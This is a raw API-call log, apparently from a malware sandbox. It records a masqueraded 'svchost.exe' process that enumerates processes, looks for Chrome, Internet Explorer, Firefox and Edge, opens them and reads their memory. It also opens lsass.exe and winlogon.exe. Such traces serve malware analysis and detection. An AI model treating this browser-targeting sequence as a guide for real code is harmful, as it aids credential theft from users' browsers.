	[0221.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.987] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0221.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.988] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.989] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0221.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.990] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.990] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0221.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5298
	[0221.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.991] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0221.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.992] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.992] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0221.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.993] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.993] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0221.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x529c
	[0221.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.994] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0221.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.995] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.995] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0221.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.996] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0221.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x52a0
	[0221.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.997] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0221.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.998] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.998] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0221.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.999] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0222.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x52a4
	[0222.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.000] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0222.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.001] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.001] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0222.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.002] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x52a8
	[0222.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.003] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.003] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.004] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.004] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.004] NtQueryInformationProcess (in: ProcessHandle=0x52a8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.004] ReadProcessMemory (in: hProcess=0x52a8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.004] ReadProcessMemory (in: hProcess=0x52a8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.005] ReadProcessMemory (in: hProcess=0x52a8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.005] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.005] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x52ac
	[0222.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.006] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.006] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.006] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.007] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.007] NtQueryInformationProcess (in: ProcessHandle=0x52ac, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.007] ReadProcessMemory (in: hProcess=0x52ac, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.007] ReadProcessMemory (in: hProcess=0x52ac, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.007] ReadProcessMemory (in: hProcess=0x52ac, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.007] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x52b0
	[0222.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.009] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.009] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.010] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0222.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x52b4
	[0222.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.011] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0222.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.011] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.012] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0222.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.012] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.013] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x52b8
	[0222.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.013] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.014] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.014] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.014] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.014] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x52bc
	[0222.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.016] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.017] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.017] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.018] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x52c0
	[0222.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.019] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.019] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.019] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.022] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x52c4
	[0222.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.023] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.024] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.024] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.024] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.025] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0222.025] CloseHandle (hObject=0x4fd0) returned 1
	[0222.025] Sleep (dwMilliseconds=0x64) 
	[0222.130] GetCurrentProcessId () returned 0x110
	[0222.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0222.136] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0222.138] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0222.140] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0222.141] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x52c8
	[0222.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.142] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.142] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.142] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.142] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.143] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x52cc
	[0222.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.144] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.144] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.144] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.145] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.145] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0222.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x52d0
	[0222.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.146] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0222.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.146] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.146] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0222.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.147] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.147] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x52d4
	[0222.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.148] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.148] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.149] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.149] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0222.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x52d8
	[0222.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.151] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0222.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.151] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.152] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0222.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.152] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.153] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0222.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x52dc
	[0222.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.154] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0222.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.154] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.155] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0222.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.155] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.156] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0222.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x52e0
	[0222.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.157] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0222.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.157] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.158] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0222.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.158] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.158] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0222.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x52e4
	[0222.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.159] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.160] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.160] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.160] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x52e8
	[0222.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.161] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.162] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.162] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
